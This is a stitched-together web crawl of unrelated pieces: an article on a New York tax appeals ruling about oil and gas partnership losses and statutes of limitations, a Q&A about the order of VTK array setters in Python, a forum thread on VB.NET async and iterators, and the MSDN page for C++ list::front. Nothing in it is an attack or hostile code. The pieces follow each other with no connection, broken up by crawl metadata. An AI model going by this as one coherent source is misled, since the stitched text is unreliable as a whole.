In 2005, the Department’s Field Audit Bureau commenced an audit of the taxpayer’s PIT returns, initially for the years 2002 through 2004, and later expanded to include 2001, primarily relating to his claimed losses from the oil and gas partnerships. The Department’s Tax Shelter Unit informed the Field Audit Bureau that there were other audit cases involving the same partnerships, and that the partnerships “might be questionable.” The three-year statute of limitations for assessment had already expired for 2001, but the Field Audit Bureau took the position that the six-year statute of limitations for understatements attributable to tax shelter activity was instead applicable. With that six-year period about to expire for the 2001 tax year, the Department issued a notice of deficiency (“Notice”) based on the disallowance of the taxpayer’s losses from the partnerships. A separate Notice was issued asserting a fraud penalty based on the taxpayer’s alleged failure to participate in a 2005 New York State voluntary compliance initiative.
In 2013, while the Notice for 2001 was being contested at the Department’s Conciliation Bureau, the Department issued a Notice for 2002, also based on the disallowance of the partnership losses, and also asserting a penalty for failure to participate in the 2005 voluntary compliance initiative. Both the three-year and six-year statutes of limitations for the 2002 year had expired, but the Department took the position that the taxpayer’s returns were false or fraudulent and claimed that therefore no statute of limitations was applicable. It is unclear from the decision when and on what basis the initial fraud determination was made, but the Department’s auditor testified that the fraud determination was made by the Department’s Office of Counsel. The taxpayer’s estate maintained that the Notices were time-barred.
The decision — which is 74 pages long — goes into considerable detail regarding the nature of the oil and gas industry, including drilling risks and drilling contract types, as well as the taxpayer’s cash and subscription note investments in those partnerships, all of which is beyond the scope of this article (although it is recommended reading for learning about the industry). The decision discusses the fact that the oil and gas partnerships entered into “turnkey drilling arrangements.” Under this common arrangement, a turnkey driller accepts a fixed fee to develop the oil and gas wells and runs the considerable risk of cost overruns. As a result, turnkey contracts are more costly to investors.
More than half of the wells drilled by the partnerships generated hundreds of millions of dollars of oil and gas revenues. However, they were all designed to be eligible to deduct intangible drilling costs in the first year of operation. The taxpayer’s finance and valuation expert testified at the hearing that the three principal purposes for investing in oil and gas ventures — potential profit, portfolio diversification, and tax benefits — were all present here. The taxpayer’s oil and gas expert testified that the terms of the turnkey drilling contracts were reasonable relative to industry standards. The Department’s petroleum engineer expert testified that the industry-standard mark-up for turnkey drilling contracts was 10-25% above drilling costs, far less than the mark-ups in question, which were paid to drilling companies controlled by the taxpayer. However, the Department’s expert admitted that he had limited experience evaluating turnkey contracts, and he made several concessions regarding the limited scope of his research.
Law. As relevant here, there are two exceptions to the three-year statute of limitations. First, the tax may be assessed at any time if a “false or fraudulent return” is filed “with intent to evade tax.” Tax Law § 683(c)(1)(B). The limitation period is extended to six years “if the deficiency is attributable to an abusive tax avoidance transaction.” Tax Law § 683(c)(11)(B). The Department bears the burden of proving that the taxpayer filed a false or fraudulent return (here, for the 2002 tax year). On the other hand, the taxpayer bears the burden of proof to rebut an assertion of an abusive tax avoidance transaction (for the 2001 tax year).
ALJ determination. The ALJ first concluded that for 2002 the Department did not meet its burden of proof to show that the taxpayer filed a false or fraudulent return through “clear, definite and unmistakable evidence of every element of fraud.” The ALJ found that the Department’s “asserted basis for finding fraud has been fluid and inconsistent throughout the proceedings herein,” and she did not find the testimony of the Department’s expert to be “compelling.” Moreover, the ALJ rejected the claim made in the Department’s post-hearing brief that the taxpayer promoted abusive tax shelters, noting that the assertion was not at issue at the hearing.
As for whether the taxpayer’s investments in the oil and gas partnerships were abusive tax avoidance transactions triggering a six-year statute of limitations, the test was whether the taxpayer proved that his investments were not “for the principal purpose of avoiding tax.” The ALJ found that the taxpayer met his burden for some, but not all, of the partnerships. The critical difference among them was that for some partnerships the subscription note for the taxpayer’s partnership investment was shown to be genuine debt but for other partnerships similar proof was not provided.
The ALJ distinguished Matter of Sznajderman, DTA No. 824235 (N.Y.S. Tax App. Trib., July 11, 2016), appeal to 3rd Dep’t pending, where the Tribunal upheld the Department’s reliance on the six-year statute of limitations for abusive tax avoidance transactions in a case involving some of the same oil and gas partnerships as were involved here, and for one of the same tax years. The ALJ found that the “lynchpin” of that decision — that the investor’s subscription note obligation representing his investment in the partnership lacked “economic reality” — was not present in this case, and she ruled that the Department’s reliance on Sznajderman was misplaced.
For two of the partnerships for which the taxpayer did not meet his burden of proof regarding tax avoidance, however, the ALJ found that the Department lacked a rational basis for disallowing the taxpayer’s share of losses, noting that the Department did not explain the reason for disallowing losses resulting from the taxpayer’s cash-only investments in those partnerships.
Finally, for the disallowed losses that were found to be timely asserted, the ALJ upheld the imposition of penalties for the taxpayer’s failure to participate in the 2005 New York State voluntary compliance initiative, noting that there are no provisions in the Tax Law for the abatement of such penalties.
ADDITIONAL INSIGHTS
The Department’s claim that the taxpayer’s 2002 return was false or fraudulent seems particularly tenuous, and the ALJ provides a thorough analysis of why the Department did not meet its considerable burden of proof as to fraud. While the tax benefits of investing in an oil and gas partnership invite scrutiny, there was scant evidence that the taxpayer’s income tax returns were false or fraudulent.
The question of whether the taxpayer’s investments constituted abusive tax avoidance transactions (thereby permitting a six-year statute of limitations for 2001) was less clear cut, as evidenced by the ALJ’s fact-intensive analysis for why the taxpayer met his burden of proof as to some partnerships but not as to others. While Sznajderman involved similar facts and issues, the ALJ found that the decision was not determinative because of the crucial differences regarding the economic substance of the respective taxpayers’ subscription notes for their investments.
It is interesting that, although the Department and the IRS appear to have cooperated on their audits of the oil and gas partnerships and the IRS did not propose any adjustments, the ALJ did not reference that fact in her conclusion.
Both this decision and the decision in Matter of Steuben Delshah, LLC (discussed in the preceding article) illustrate the significant evidentiary hurdles that the New York State and City tax departments must meet in order to disregard the statute of limitations by proving that the taxpayer filed a false or fraudulent return with willful intent to evade tax.
|
https://www.lexology.com/library/detail.aspx?g=f168d1ca-6439-45bb-aee3-9165b8f7aac9
|
CC-MAIN-2019-04
|
en
|
refinedweb
|
import vtk
import numpy as np
from itertools import product as itprod
vertices = np.array(list(itprod([0, 1], repeat=3)))
print vertices.shape[0]  # 8 vertices
print vertices.shape[1]  # 3 coordinates x-y-z
array = vtk.vtkFloatArray()
array.SetNumberOfComponents(vertices.shape[1])
array.SetNumberOfTuples(vertices.shape[0])
print array  # number of tuples is 8, number of components is 3: OK
array = vtk.vtkFloatArray()
array.SetNumberOfTuples(vertices.shape[0])
array.SetNumberOfComponents(vertices.shape[1])
print array  # number of tuples is 2, number of components is 3: WRONG
VTK is always a fickle thing, especially when it comes to documentation. I found some information on
SetNumberOfTuples and
SetNumberOfComponents at the corresponding links.
The former (
SetNumberOfTuples):
Set the number of tuples (a component group) in the array.
Note that this may allocate space depending on the number of components. [...]
The latter (
SetNumberOfComponents):
Set/Get the dimension (n) of the components.
Must be >= 1. Make sure that this is set before allocation.
As I see it, the former may allocate space, but the latter has to be called before any allocation. So they indeed do not commute; you need to call the latter first, and that is the working order (which is in line with your results).
The links obviously refer to the C++ documentation rather than the Python implementation, but given that the C++ version is not supposed to commute, you should not expect commutativity in Python either.
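For completeness, a small sketch of the working order (this snippet is added for illustration, not part of the original answer); the SetTuple3 loop is just one way to fill the allocated tuples:
import vtk
import numpy as np
from itertools import product as itprod

vertices = np.array(list(itprod([0, 1], repeat=3)))

array = vtk.vtkFloatArray()
array.SetNumberOfComponents(vertices.shape[1])  # set the component count first...
array.SetNumberOfTuples(vertices.shape[0])      # ...then allocate the tuples
for i, (x, y, z) in enumerate(vertices):
    array.SetTuple3(i, float(x), float(y), float(z))
print array  # reports 8 tuples with 3 components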
|
https://codedump.io/share/WwUDV8XvIAXe/1/vtkpython-vtkfloatarray-setters-for-tuple-and-component-don39t-commute
|
CC-MAIN-2017-13
|
en
|
refinedweb
|
Stephen Toub: Task-Based Asynchrony with Async
mmm.
Yes
Unsafe? No
I think Extension Custom Operators would be interesting.
These custom operator have no precedence, so you need to use ( )'s accomplish it.
Public Operators Ops_Double
    ' A Simple one Roots.'
    <Extension()>
    Public Operator /¯ (ByVal x As Double, ByVal y As Double) As Double
        ' Inside here the usage of /¯ is an Error '
        ' Error is Infinite Recursion '
        If x = 0 Then Throw New AttemptToDivideByZero()
        Return y^(1/x)
    End Operator
End Operators

Using Operator From {namespace}
    Dim r as Double = 3 /¯ 27  ' r = 3 ( The cube root )'
End
8 hours ago, exoteric wrote
This is a stellar going deep! Lucian is a great presenter.
Agreed. I'd like to get Lucian on C9 again. He's super bright and articulate!
C
I agree we need more Lucian.
Possibly one of the most useful benefits of having Iterators.
<Runtime.CompilerServices.Extension()>
Public Iterator Function AsEnumerable(ByVal f As IEnumerator) As IEnumerable
    f.Reset()
    While f.MoveNext
        Yield f.Current
    End While
    f.Reset()
End Function
using (var writer = StreamWriter(dialog.OpenFile()))
{
    WriteResults(writer, dialog.FilterIndex)
}

async void WriteResults(StreamWriter writer, int whatToExport)
{
    if (whatToExport is something that isn't computed)
    {
        await TaskEx.Run(() => Compute(...))
    }
    // write the result here
    // Raises an exception, that the stream is closed
}
using (var x = ...) { SomeAsyncMethod(x); }
are used?
Lucian was excellent!!! I didn't get lost in translation LOL!!! He is so right about that everyone has the misconception of Async = background process
Great job Lucian !!
Lucian kicks * !
|
https://channel9.msdn.com/Shows/Going+Deep/Lucian-Wischik-Inside-VBNET-Async?format=flash
|
CC-MAIN-2017-13
|
en
|
refinedweb
|
Probability Density Functions (PDFs) describe the probability of observing some continuous random variable in some region of space. For a one-dimensional random variable X, recall that the PDF f(x) has the properties that:
- The probability that the variable takes a value between a and b is P(a <= X <= b) = integral of f(x) over [a, b]
- The probability that the variable takes a value exactly equal to any single point is zero
Estimating such a PDF from a sample of observations is a common problem in Machine Learning. This comes in handy in many outlier detection algorithms, where we seek to estimate the "true" distribution based on sample observations and then classify some of the existing or new observations as outliers or not. For instance, an auto-insurer interested in catching fraud might examine the claim amounts requested for each type of body-work, say bumper replacement, and mark for potential fraud any amount which is too high. By way of another example, a child psychologist may examine the time taken to complete a given task across different children and mark those children who take too long or too short a time for potential investigation.
In this blog post, we discuss how we can learn the PDF from a sample of observations, so that we can calculate the probability of each observation and decide whether it is a common or a rare occurrence.
First we generate some random data for demonstration.
set.seed(123)
data <- c(rnorm(200, 10, 20), rnorm(200, 60, 30), runif(200, 120, 180)) # 600 points
Next, we visualize the data for our understanding, using a histogram, as in Figure 1.
# Plot 1
hist(data, breaks=50, freq=F, main="Univariate Distribution", xlab="Data Value")
# Plot 2
hist(data, breaks=20, freq=F, main="", xlab="20 Data Bins", col='red', border='red')
par(new=T)
hist(data, breaks=100, freq=F, main="Univariate Distribution", xlab=NULL, xaxt='n', yaxt='n')
Figure 1 – Data Visualization using 50-Bin Histogram
While histograms are charts for data visualization, you can also see that they are our first estimate of density. More specifically, we can estimate the density by dividing the data into bins of width h, assuming the density is constant within each bin, and setting its value to the proportion of observations falling into that bin divided by the bin width.
Hence, for x lying in bin j, which contains n_j of the N observations, the estimated PDF is f̂(x) = n_j / (N * h).
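As a small check (this snippet is an addition for illustration, reusing the data vector from above), we can recompute the 50-bin densities by hand and compare them with what hist() reports:
h.obj <- hist(data, breaks=50, plot=FALSE)
bin.width <- diff(h.obj$breaks)[1]            # equal-width bins
manual.density <- h.obj$counts / (length(data) * bin.width)
all.equal(manual.density, h.obj$density)      # TRUE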
And you realize that we have made an assumption about the bin-width, which will impact the density estimate. Hence bin-width is a parameter of the histogram density estimation model. An often overlooked fact is that we are also working with one more parameter, the starting position of the first bin, and you can see how that may affect the density estimates for all bins. To see the impact of bin-width, Figure 2 overlays density estimates from 20-bin and 100-bin histograms. Look at the encircled region, where fewer/coarser bins give a flat density estimate, while many/finer bins give a varying density estimate. For the yellow point, the density estimates from the two models range from 0.004 to 0.008.
Thus, selecting the parameters correctly is crucial to getting the density estimate right. We will get to that, but note that there are also other problems with histograms. Density estimates using histograms are quite jerky and discontinuous: the density is flat within a bin and then changes drastically for a point infinitesimally outside the bin. This makes the consequence of a wrong estimate even worse for practical problems.
Lastly, we have been working with a one-dimensional variable for ease of illustration, but in practice most problems are multi-dimensional. Since the number of bins grows exponentially with the number of dimensions, the number of observations required to estimate the density also grows. In fact, it is plausible that despite having millions of observations, many bins remain empty or contain only single-digit counts. With just 50 bins in each of just 3 dimensions, we have 50^3 = 125,000 cells which need to be populated. Assuming a uniform distribution, a training set of a million observations gives an average of only 8 observations per cell.
For bin-width h and a total of N observations, with n_J observations falling into bin J, the estimated proportion of observations in that bin is p̂_J = n_J / N,
and the density estimate for any x in bin J is f̂(x) = p̂_J / h.
Statistical theory proves that while f̂(x) has the average density over the bin as its expected value, its variance is Var(f̂(x)) = p_J (1 - p_J) / (N * h^2), since n_J follows a Binomial(N, p_J) distribution.
While we can get a better (less biased) density estimate by reducing the bin-width h, we increase the variance of the estimate, as we can intuitively feel about too fine a bin-width. We can use the leave-one-out cross-validation technique to estimate the optimal set of parameters: estimate the density using all observations but one, then compute the density of the left-out observation and measure the error in estimation. Solving this mathematically for histograms gives a closed-form loss function for a given bin-width:
J(h) = 2 / ((N - 1) * h) - ((N + 1) / ((N - 1) * h)) * sum_j p̂_j^2
where the sum runs over the m bins. Technical details of the above are in this lecture. We can plot this loss function for various numbers of bins (Figure 3):
getLoss <- function(n.break) {
N <- 600
res <- hist(data, breaks=n.break, freq=F)
bin <- as.numeric(res$breaks)
h <- bin[2]-bin[1]
p <- res$density
p <- p * h
return ( 2/(h*(N-1)) - ( (N+1)/(h*(N-1))*sum(p*p) ) )
}
loss.func <- data.frame(n=1:600)
loss.func$J <- sapply(loss.func$n, function(x) getLoss(x))
# Plot 3
plot(loss.func$n, loss.func$J, col='red', type='l')
opt.break <- max(loss.func[loss.func$J == min(loss.func$J), 'n'])
print(opt.break)
# Plot 4
hist(data, breaks=opt.break, freq=F, main="Univariate Distribution", xlab="15 Data Bins")
and get the optimal number of bins as 15. Actually, anything from 8-15 is fine.
Consequently, Figure 4 below shows the density estimate which balances density values as well as granularity (with an optimal bias-variance tradeoff).
If you feel a little uneasy at this point, then I am with you. Even though the number of bins is mathematically optimal, it feels like too coarse an estimation, and there is no intuitive feeling that we have done the best job. And let's not forget the other concerns about starting position, discontinuous estimation, and the curse of dimensionality. Despair not, there is a better way. In the next post we will talk about density estimation using kernels.
|
http://www.edupristine.com/blog/density-estimation-using-histograms
|
CC-MAIN-2017-13
|
en
|
refinedweb
|
#include <math.h>
double tan(double x);
float tanf(float x);
long double tanl(long double x);
Link with -lm.
The tan() function returns the tangent of x, where x is given in radians.
Multithreading (see pthreads(7))
The tan(), tanf(), and tanl() functions are thread-safe.
C99, POSIX.1-2001. The variant returning double also conforms to SVr4,
4.3BSD, C89.
webmaster@linuxguruz.com
|
http://www.linuxguruz.com/man-pages/tanl/
|
CC-MAIN-2017-13
|
en
|
refinedweb
|
Red Hat Bugzilla – Bug 23221
up2date fails on run, AttributeError: Up2dateConfig (wrong config is read)
Last modified: 2015-01-07 18:42:41 EST
up2date consistently fails to run on RH 62.
up2date version:
Name : up2date Relocations: (not relocateable)
Version : 2.1.7 Vendor: Red Hat, Inc.
Release : 0.6.x Build Date: Thu 21 Dec 2000
08:25:52 PM IST
Install date: Tue 02 Jan 2001 09:29:25 PM IST Build Host:
porky.devel.redhat.com
Group : System Environment/Base Source RPM:
up2date-2.1.7-0.6.x.src.rpm
Size : 219264 License: GPL
Packager : Red Hat, Inc. <>
Summary : Automatically update RPMs for a Red Hat Linux System
Description :
Errors are from any utility that uses up2date configs, like:
Traceback (innermost last):
File "/usr/sbin/up2date-config", line 312, in ?
main()
File "/usr/sbin/up2date-config", line 307, in main
gui = Gui()
File "/usr/sbin/up2date-config", line 55, in __init__
self.cfg = config.Up2dateConfig()
AttributeError: Up2dateConfig
and same error from up2date. Seems to be because python
(python-1.5.2-27.6.x) also has config.py and the script includes that
config.py instead of up2date's. If I change config to config2 in every
place in up2date (imports and config.Up2dateConfig()), it works.
that shouldn't matter. Works fine on my RHL 6.2 box.
Can I see the output of:
rpm -V up2date
rpm -V up2date-gnome
rpm -V python
rpm -V up2date
SM?....T c /etc/sysconfig/rhn/up2date
missing /usr/share/rhn/up2date/config.pyc
S.5....T /usr/share/rhn/up2date/translate.pyc
S.5....T /usr/share/rhn/up2date/up2date.py
SM5....T /usr/share/rhn/up2date/up2date.pyc
rpm -V up2date-gnome
S.5....T /usr/sbin/up2date-config
S.5....T /usr/share/rhn/up2date/checklist.pyc
S.5....T /usr/share/rhn/up2date/configdlg.py
S.5....T /usr/share/rhn/up2date/configdlg.pyc
S.5....T /usr/share/rhn/up2date/gui.pyc
S.5....T /usr/share/rhn/up2date/progress.pyc
rpm -V python
did not produce any output
Assigned QA to jturner
You are missing the compiled up2date python config class:
missing /usr/share/rhn/up2date/config.pyc
Doh.
Yes, it is missing, because *I had to remove it to make it run*.
OK, seems I did not make myself clear.
Python has config. up2date has config. When up2date uses "config" it thinks it's
config for up2date, but apparently it's config for python. If I change every
reference of config to config2, it works. I'm not sure if removing config.pyc
necessary to make it run, but renaming was necessary. I guess these two lines
are the cause:
sys.path.append("/usr/share/rhn/up2date/")
import config
I'm not a big Python pro, but I imply that if you append directory to the path,
it is searched after all others? And if some previous path has config, the
import will be taken from there? Am I wrong?
Look:
Something is _different_ about your system than ANY other Red Hat Linux system
out there. I'm not sure what, but something. We don't have this problem on any
of our test boxes. THOUSANDS of other people are using up2date without this
issue.
This config class you speak of that python has -- we don't ship any "config.py"
class with python by default. so you have added something to your system.
More info.
[pbrown@xanadu pbrown]$ rpm -q python
python-1.5.2-27.6.x
[pbrown@xanadu pbrown]$ rpm -V python
[pbrown@xanadu pbrown]$ rpm -ql python | grep config
[pbrown@xanadu pbrown]$ rpm -ql python |grep config
[pbrown@xanadu pbrown]$
|
https://bugzilla.redhat.com/show_bug.cgi?id=23221
|
CC-MAIN-2017-13
|
en
|
refinedweb
|
MooseX::Role::Restricted - (DEPRECATED) Restrict which sub are exported by a role
package MyApp::MyRole; use MooseX::Role::Restricted; sub method1 { ... } sub _private1 { ... } sub _method2 :Public { ... } sub private2 :Private { ... }
This module is no longer supported. I suggest looking at namespace::autoclean as an alternative. In its default form, MooseX::Role::Restricted simply causes any sub with a name starting with
_ to be excluded. This can be accomplished using
use namespace::autoclean -also => qr/^_/;
If you are using
lazy_build or other Moose features that require the use of
_ prefixed methods make sure to change the pattern to not match those. Or use some other prefix, for example a double
_, for your private subs that you do not want included in the role.
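A rough sketch of that suggestion (the double-underscore convention and the sub bodies here are illustrative only):
package MyApp::MyRole;
use Moose::Role;
use namespace::autoclean -also => qr/^__/;  # clean away __ helpers, keep _build_* etc.

sub method1   { 'composed into consuming classes' }
sub __helper1 { 'cleaned away, not composed' }

1;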
By default Moose::Role will export any sub you define in a role package. However, it does not export any sub which was imported from another package.
MooseX::Role::Restricted gives a little more control over which subs are exported and which are not.
By default, any sub with a name starting with
_ is considered private and will not be exported. However, MooseX::Role::Restricted provides two subroutine attributes,
:Public and
:Private, which control whether any sub is exported or kept private.
Graham Barr <gbarr@cpan.org>
This program is free software; you can redistribute it and/or modify it under the same terms as Perl itself.
|
http://search.cpan.org/~gbarr/MooseX-Role-Restricted-1.03/lib/MooseX/Role/Restricted.pm
|
CC-MAIN-2017-13
|
en
|
refinedweb
|
The RDF data model [7] represents information as sets of statements, which can be visualized as node-and-arc-labeled directed graphs. The data model is designed for the integrated representation of information that originates from multiple sources, is heterogeneously structured, and is represented using different schemata. RDF can be viewed as a lingua franca, capable of moderating between other data models that are used on the Web.
In RDF, information is represented in statements, called RDF triples. The three parts of each triple are called its subject, predicate, and object. A triple mimics the basic structure of a simple sentence, such as for example:
Burkhard Jung
is the mayor of
Leipzig
(subject)
(predicate)
(object)
The following is the formal definition of RDF triples as it can be found in the W3C RDF standard [7].
Definition 1 (RDF Triple). Assume there are pairwise disjoint infinite sets I, B, and L representing IRIs, blank nodes, and RDF literals, respectively. A triple (v1, v2, v3) ∈ (I ∪ B) × I × (I ∪ B ∪ L) is called an RDF triple. In this tuple, v1 is the subject, v2 the predicate and v3 the object. We call T = I ∪ B ∪ L the set of RDF terms.
The main idea is to use IRIs as identifiers for entities in the subject, predicate and object positions in a triple. Data values can be represented in the object position as literals. Furthermore, the RDF data model also allows the use of identifiers for unnamed entities (called blank nodes) in the subject and object positions; these are not globally unique and can thus only be referenced locally. However, the use of blank nodes is discouraged in the Linked Data context. Our example fact sentence about Leipzig's mayor would now look as follows:
<leipzig.de/id>
<example.org/p/hasMayor>
<Burkhard-Jung.de/id> .
(subject) (predicate) (object)
This example shows that IRIs used within a triple can originate from different namespaces thus effectively facilitating the mixing and mashing of different RDF vocabularies and entities from different Linked Data knowledge bases. A triple having identifiers from different knowledge bases at subject and object position can be also viewed as an typed link between the entities identified by subject and object. The predicate then identifies the type of link. If we combine different triples we obtain an RDF graph.
Definition 2 (RDF Graph). A finite set of RDF triples is called an RDF graph. The RDF graph itself represents a resource, which is located at a certain location on the Web and thus has an associated IRI, the graph IRI.
Fig. 3. Example RDF graph describing the city of Leipzig and its mayor.
An example of an RDF graph is depicted in Fig. 3. Each unique subject or object contained in the graph is visualized as a node (i.e. oval for resources and rectangle for literals). Predicates are visualized as labeled arcs connecting the respective nodes. There are a number of synonyms being used for RDF graphs, all meaning essentially the same but stressing different aspects of an RDF graph, such as RDF document (file perspective), knowledge base (collection of facts), vocabulary (shared terminology), ontology (shared logical conceptualization).
The initial official W3C RDF standard [7] comprised a serialization of the RDF data model in XML called RDF/XML. Its rationale was to integrate RDF with the existing XML standard, so it could be used smoothly in conjunction with the existing XML technology landscape. However, RDF/XML turned out to be difficult to understand for the majority of potential users, because it requires familiarity with two data models (i.e., the tree-oriented XML data model as well as the statement-oriented RDF data model) and the interactions between them, since RDF statements are represented in XML. As a consequence, with N-Triples, Turtle and N3 a family of alternative text-based RDF serializations was developed, whose members have the same origin but balance differently between readability for humans and machines. Later, in 2009, RDFa (RDF in Attributes, [1]) was standardized by the W3C in order to simplify the integration of HTML and RDF and to allow the joint representation of structured and unstructured content within a single source HTML document. Another RDF serialization, which is particularly beneficial in the context of JavaScript web applications and mashups, is the serialization of RDF in JSON. Figure 4 presents an example serialized in the most popular serializations.
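For instance, the Leipzig triple from above could be written in Turtle roughly as follows (the prefix declarations and the rdfs:label literal are added here purely for illustration):
@prefix ex:   <http://example.org/p/> .
@prefix rdfs: <http://www.w3.org/2000/01/rdf-schema#> .

<http://leipzig.de/id> ex:hasMayor <http://Burkhard-Jung.de/id> ;
                       rdfs:label  "Leipzig" .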
|
http://academlib.com/20519/_computer_science/data_model
|
CC-MAIN-2017-13
|
en
|
refinedweb
|
fredrikj.net / blog /
Hypergeometric 2F1, incomplete beta, exponential integrals
June 11, 2009
One of the classes of functions I’m currently looking to improve in mpmath is the hypergeometric functions; particularly 1F1 (equivalently the incomplete gamma function) and the Gauss hypergeometric function 2F1.
For example, the classical orthogonal polynomials (Legendre, Chebyshev, Jacobi) are instances of 2F1 with certain integer parameters, and 2F1 with noninteger parameters allows for generalization of these functions to noninteger orders. Other functions that can be reduced to 2F1 include elliptic integrals (though mpmath uses AGM for these). With a good implementation of 2F1, these functions can be implemented very straightforwardly without a lot of special-purpose code to handle all their corner cases.
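As a quick illustration of that connection, here is a sanity check of the classical identity P_n(x) = 2F1(-n, n+1; 1; (1-x)/2); the session below is illustrative and not from the original post:
>>> from mpmath import mp, legendre, hyp2f1
>>> mp.dps = 15
>>> print legendre(3, 0.75)
-0.0703125
>>> print hyp2f1(-3, 4, 1, (1-0.75)/2)
-0.0703125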
Numerical evaluation of 2F1 is far from straightforward, and the hyp2f1 function in mpmath used to be quite fragile. The hypergeometric series only converges for |z| < 1, and rapidly only for |z| << 1. There is a transformation that replaces z with 1/z, but this leaves arguments close to the unit circle which must be handled using further transformations. As if things weren't complicated enough, the transformations involve gamma function factors that often become singular even when the value of 2F1 is actually finite, and obtaining the correct finite value involves appropriately cancelling the singularities against each other.
After about two days of work, I’ve patched the 2F1 function in mpmath to the point where it should finally work for all complex values of a, b, c, z (see commits here). I’m not going to bet money that there isn’t some problematic case left unhandled, but I’ve done tests for many of the special cases now.
The following is a very simple example that previously triggered a division by zero but now works:
>>> print hyp2f1(3,-1,-1,0.5)
2.5
The following previously returned something like -inf + nan*j, due to incorrect handling of gamma function poles, but now works:
>>> print hyp2f1(1,1,4,3+4j)
(0.492343840009635 + 0.60513406166124j)
>>> print (717./1250-378j/625)-(6324./15625-4032j/15625)*log(-2-4j) # Exact
(0.492343840009635 + 0.60513406166124j)
Evaluation close to the unit circle used to be completely broken, but should be fine now. A simple test is to integrate along the unit circle:
>>> mp.dps = 25
>>> a, b, c = 1.5, 2, -4.25
>>> print quad(lambda z: hyp2f1(a,b,c,exp(j*z)), [pi/2, 3*pi/2])
(14.97223917917104676241015 + 1.70735170126956043188265e-24j)
Mathematica gives the same value:
In[17]:= NIntegrate[Hypergeometric2F1[3/2,2,-17/4,Exp[I z]],
{z, Pi/2, 3Pi/2}, WorkingPrecision->25]
-26
Out[17]= 14.97223917917104676241014 - 3.514976640925973851950882 10 I
Finally, evaluation at the singular point z = 1 now works and knows whether the result is finite or infinite:
>>> print hyp2f1(1, 0.5, 3, 1)
1.333333333333333333333333
>>> print hyp2f1(1, 4.5, 3, 1)
+inf
As a consequence of these improvements, several mpmath functions (such as the orthogonal polynomials) should now work for almost all complex parameters as well.
The improvements to 2F1 also pave the way for some new functions. One of the many functions that can be reduced to 2F1 is the generalized incomplete beta function:
An implementation of this function (betainc(a,b,x1,x2)) is now available in mpmath trunk. I wrote the basics of this implementation a while back, but it was nearly useless without the recent upgrades to 2F1. Evaluating the incomplete beta function with various choices of parameters proved useful to identify and fix some corner cases in 2F1.
One important application of the incomplete beta integral is that, when regularized, it is the cumulative distribution function of the beta distribution. As a sanity check, the following code successfully reproduces the plot of several beta CDFs on the Wikipedia page for the beta distribution (I even got the same colors!):
def B(a,b):
return lambda t: betainc(a,b,0,t,regularized=True)
plot([B(1,3),B(0.5,0.5),B(5,1),B(2,2),B(2,5)], [0,1])
The betainc function is superior to manual numerical integration because of the numerically hairy singularities that occur at x = 0 and x = 1 for some choices of parameters. Thanks to having a good 2F1 implementation, betainc gives accurate results even in those cases.
The betainc function also provides an appropriate analytic continuation of the beta integral, internally via the analytic continuation of 2F1. Thus the beta integral can be evaluated outside of the standard interval [0,1]; for parameters where the integrand is singular at 0 or 1, this is in the sense of a contour that avoids the singularity.
It is interesting to observe how the integration introduces branch cuts; for example, in the following plot, you can see that 0 is a branch point when the first parameter is fractional and 1 is a branch point when the second parameter is fractional (when both are positive integers, the beta integral is just a polynomial, so it then behaves nicely):
# blue, red, green
plot([B(2.5,2), B(3,1.5), B(3,2)], [-0.5,1.5], [-0.5,1.5])
To check which integration path betainc “uses”, we can compare with numerical integration. For example, to integrate from 0 to 1.5, we can choose a contour that passes through +i (in the upper half plane) or -i (in the lower half plane):
>>> mp.dps = 25
>>> print betainc(3, 1.5, 0, 1.5)
The sign of the imaginary part shows that betainc gives the equivalent of a contour through the lower half plane. The convention turns out to agree with that used by Mathematica:
In[10]:= Beta[0, 1.5, 3, 1.5]
Out[10]= 0.152381 + 0.402377 I
I’ll round things up by noting that I’ve also implemented the generalized exponential integral (the En-function) in mpmath as expint(n,z). A sample:
>>> print expint(2, 3.5)
0.005801893920899125522331056
>>> print quad(lambda t: exp(-3.5*t)/t**2, [1,inf])
0.005801893920899125522331056
The En-function is based on the incomplete gamma function, which is based on the hypergeometric series 1F1. These functions are still slow and/or inaccurate for certain arguments (in particular, for large ones), so they will require improvements along the lines of those for 2F1. Stay tuned for progress.
In other news, mpmath 0.12 should be in both SymPy and Sage soon. With this announcement I’m just looking for an excuse to tag this post with both ‘sympy’ and ‘sage’ so it will show up on both Planet SymPy and Planet Sage :-) Posts purely about mpmath development should be relevant to both audiences though, I hope.
|
http://fredrikj.net/blog/2009/06/hypergeometric-2f1-incomplete-beta-exponential-integrals/
|
CC-MAIN-2017-13
|
en
|
refinedweb
|
ldns_dnssec_zone, ldns_dnssec_name, ldns_dnssec_rrs, ldns_dnssec_rrsets-
#include <stdint.h>
#include <stdbool.h>
#include <ldns/ldns.h>

/* Set to true if this name is glue (as marked by ldns_dnssec_zone_mark_glue()) */

(See also ldns_dnssec_zone_new, ldns_dnssec_name_new, ldns_dnssec_rrs_new, ldns_dnssec_rrsets_new.)
|
http://huge-man-linux.net/man3/ldns_dnssec_zone.html
|
CC-MAIN-2017-13
|
en
|
refinedweb
|
I want to fetch data from mysql database to asp.net dropdown control. How can I do this.
I can fetch data from ms sql server to asp.net page. Please help me to fetch data from mysql database.
i have a dropdownbox and a gridview
what I want is to have a list item which populates all data in a gridview.
I have tried using list item selected value=0 but to no avail.
what is the easiest way to achieve this? How would I join the fields together?
return (from c in storedb.Product_Categories
        where c.Category_Name.Contains(searchText)
        orderby c.Category_Name
        select new { c.Cat_GUID,
                     c.Category_Key && " ;" && c.Category_Name // HOW CAN I DO THIS.....
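One possible way to do this (only a sketch; the Display property name is an assumption for illustration) is to concatenate with + inside the projection:
return (from c in storedb.Product_Categories
        where c.Category_Name.Contains(searchText)
        orderby c.Category_Name
        select new
        {
            c.Cat_GUID,
            // string concatenation in C# uses +, not &&
            Display = c.Category_Key + "; " + c.Category_Name
        }).ToList();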
|
http://www.dotnetspark.com/links/21650-linq-problem-fetching-data.aspx
|
CC-MAIN-2017-13
|
en
|
refinedweb
|
This documentation is archived and is not being maintained.
list::front
Visual Studio 2008
Returns a reference to the first element in a list.
If the return value of front is assigned to a const_reference, the list object cannot be modified. If the return value of front is assigned to a reference, the list object can be modified.
When compiling with _SECURE_SCL 1, a runtime error will occur if you attempt to access an element in an empty list. See Checked Iterators for more information.
// list_front.cpp
// compile with: /EHsc
#include <list>
#include <iostream>

int main()
{
   using namespace std;
   list <int> c1;

   c1.push_back( 10 );

   int& i = c1.front();
   const int& ii = c1.front();

   cout << "The first integer of c1 is " << i << endl;
   i++;
   cout << "The first integer of c1 is " << ii << endl;
}
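For reference, this is the output the sample above should produce:
The first integer of c1 is 10
The first integer of c1 is 11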
Reference
Other Resources
|
